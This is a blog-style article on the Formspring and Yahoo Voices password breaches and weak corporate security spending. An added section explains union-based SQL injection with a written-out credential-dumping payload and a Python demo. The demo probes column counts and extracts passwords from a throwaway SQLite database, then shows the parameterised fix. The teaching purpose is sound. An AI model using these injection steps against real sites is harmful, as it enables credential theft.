The most recent breaches have hit Formspring and now, apparently, Yahoo. Formspring discovered its breach by accident and in response disabled logins for its entire user base while it figured out what had happened. After it reported that the hole was fixed, every user was prompted to change their password at the next login. This was done as a preventative measure to make sure that nobody could use the old passwords to gain access, and it should be the default action upon learning of a user account breach. While Formspring users might have been inconvenienced a little by the lack of access, forcing an immediate password change for every user is the right call.
The actual breach came through an exposed development server, which granted the attackers access to the user database. Formspring states that it is revising its internal policies to prevent this type of breach in the future. The number of stolen passwords in this attack was 420,000.
This morning we hear that Yahoo has also been hit, with an estimated 453,000 user passwords stolen. This time the entry point was an unsecured subdomain associated with Yahoo Voices. Looking at the data available, the attackers (D33D Company) hit an edge server exposed on the web and used a union-based SQL injection to get at its database.
In a union-based SQL injection the attacker appends a UNION SELECT clause to the query the application already runs, so that the database returns rows from a second table or set of columns (such as users or passwords) alongside, or instead of, the original results. UNION only works when both SELECTs return the same number of columns, so the attacker first pads the injected SELECT with NULL placeholders and adjusts the count until the database stops complaining; the NULLs are there to make the column count line up, not because the id itself is NULL. Adding ALL (UNION ALL) tells the database not to strip duplicate rows from the combined result, which keeps the injection simpler and is why most payloads use it. For example, if a page runs a query against a table such as "details" using an id parameter taken from the URL, an attacker can supply an id that matches no rows (such as -1) followed by UNION ALL SELECT username, password FROM users, and the page dutifully renders the credentials where the "details" content would have been.
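As an added illustration that is not part of the original article, the following Python script builds a throwaway SQLite database with a constructed "details" table and a constructed "users" table (the table and column names, and the sample rows, are assumptions for the example, not Yahoo's or Formspring's schema). It runs the id lookup the vulnerable way, walks through the two steps of a union-based injection (find the column count with NULL placeholders, then swap the placeholders for username and password), and shows that the same payload returns nothing once the query is parameterised.

```python
import sqlite3


def build_db():
    """Constructed sample database: a public 'details' table and a 'users'
    table the page should never expose (names and rows are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE details (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO details VALUES (1, 'Welcome', 'Hello world');
        INSERT INTO users VALUES (1, 'alice', 'hunter2'), (2, 'bob', 'letmein');
    """)
    return conn


def lookup_vulnerable(conn, raw_id):
    """The bug: the id parameter from the URL is pasted straight into the SQL
    text, so whatever the attacker sends becomes part of the query."""
    sql = "SELECT title, body FROM details WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, raw_id):
    """The fix: a bound parameter. The driver passes the value separately from
    the query text, so it is compared as a value and never parsed as SQL."""
    return conn.execute(
        "SELECT title, body FROM details WHERE id = ?", (raw_id,)
    ).fetchall()


def find_column_count(conn, max_cols=10):
    """Step 1 of the attack: UNION needs both SELECTs to return the same
    number of columns, so probe with NULL placeholders until the database
    stops raising a column-count error."""
    for n in range(1, max_cols + 1):
        payload = "-1 UNION ALL SELECT " + ", ".join(["NULL"] * n)
        try:
            lookup_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue  # column-count mismatch; try one more NULL
    return None


def dump_users(conn, ncols):
    """Step 2: swap the placeholders for real columns from the users table.
    id = -1 matches nothing, so the result set is purely the injected rows;
    ALL tells the database not to bother de-duplicating them."""
    cols = ["username", "password"] + ["NULL"] * (ncols - 2)
    payload = "-1 UNION ALL SELECT " + ", ".join(cols) + " FROM users"
    return lookup_vulnerable(conn, payload)


if __name__ == "__main__":
    db = build_db()
    n = find_column_count(db)
    print("original query returns", n, "columns")
    print("injected via string concatenation:", dump_users(db, n))
    attack = "-1 UNION ALL SELECT username, password FROM users"
    print("same payload against the parameterised query:", lookup_safe(db, attack))
```

The parameterised version does not "filter" the payload; SQLite simply treats the whole string as the value to compare against the integer id column, so no row matches and the UNION clause is never interpreted as SQL. That is the property you want from any fix for this class of bug, whatever the database.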
This means the fault lay with the web application on that server rather than with the database itself: the application built its query by concatenating untrusted input, and the attacker also needed to learn the names of the target table (usually a table) and its columns. The database simply executed the well-formed UNION it was handed; it has no way to tell an injected clause from a legitimate one. Yahoo has been criticized for poor security practices lately on multiple counts, but most notably for the apparent lack of security in its Yahoo Mail app for Android, which, according to two mobile security firms, sends user names and passwords unencrypted by default. D33D Company says that the breach and exposure of user passwords was intended to be a wakeup call for Yahoo and others before more damage was done.
The reports we have heard of companies cutting back on IT spending for security and server updates are, in our view, most likely true. This is despite some estimates putting corporate IT spending in the trillions of dollars. What we suspect is that much of that spending goes to the visible front end and not to intangible areas like security. As an example of this type of spending, I once consulted for a large law firm that spent over 300,000 on a desktop and laptop refresh but would not spend the money needed to replace servers, many of which were well over 5 years old (some still running Windows 2000). The same is happening in other areas, where network infrastructure (faster internet, improved MPLS services, faster wireless) is where the money goes, not improved protection, backups, or proper server upgrades. It is a serious flaw in the way that IT is approached, and one that we have witnessed firsthand when companies review IT budgets and spending. The thinking needs to shift, though, because the attacks and breaches are not likely to stop any time soon.